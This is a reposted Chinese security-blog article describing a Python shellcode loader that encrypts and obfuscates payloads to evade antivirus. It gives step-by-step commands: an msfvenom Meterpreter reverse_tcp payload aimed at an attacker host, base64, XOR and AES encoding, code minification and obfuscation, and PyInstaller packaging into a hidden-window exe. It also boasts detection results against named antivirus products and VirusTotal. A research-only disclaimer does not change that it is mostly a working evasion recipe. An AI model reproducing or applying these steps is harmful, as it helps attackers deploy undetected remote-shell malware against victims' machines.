python免杀shellcode加载器(加密混淆)
2022-9-30 00:1:55 Author: LemonSec(查看原文) 阅读量:59 收藏
免责声明:仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。
项目地址:
https://github.com/HZzz2/python-shellcode-loader
0x01 前言

免杀方式:msfvenom生成raw格式的shellcode-->base64-->XOR-->AES,将python代码缩小并混淆最后生成exe。

目前过DF、360和火绒,virustotal:7/66过卡巴斯基、迈克菲等。
0x02 获取项目
git clone https://github.com/HZzz2/python-shellcode-loader.gitcd python-shellcode-loaderpip install -r .\requirements.txt
0x03 使用方式

1. 生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

2. base64编码shellcode并替换jiami.py中的值

base64 -w 0 -i rev.raw > rev.bs64cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'

3. 加密base64并替换main.py中的值

python3 jiami.py
会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)
复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'

4. 缩小和混淆py代码

缩小python代码
pyminify main.py --output main-mini.py
混淆main-mini.py中的python代码 
https://pyob.oxyry.com/
将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py

5. 打包成可执行文件exe

pyinstaller.exe -Fw -i .\setting.ico --key=leslie .\main-mini-ob.py
-F打包为单文件,-w不显示窗口,-i ico图标文件,--key 加密字节码的密钥,等待打包完成。。。。打包好后的可执行程序在dist目录中。
0x04 流程图
0x05 检测图
DF
火绒

360杀毒

360安全卫士云查杀

virustotal

本文转自:Hack分享吧
侵权请私聊公众号删文

 热文推荐  

欢迎关注LemonSec
推荐阅读↓↓↓
觉得不错点个“赞”、“在看“

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247535809&idx=1&sn=2b8af8d7665451d14a26d3734a0058b8&chksm=f9e3239ace94aa8c72cb4010f67d373e3dca86f03c848b480acc3e156d7e06880b5e53516a63#rd
如有侵权请联系:admin#unsafe.sh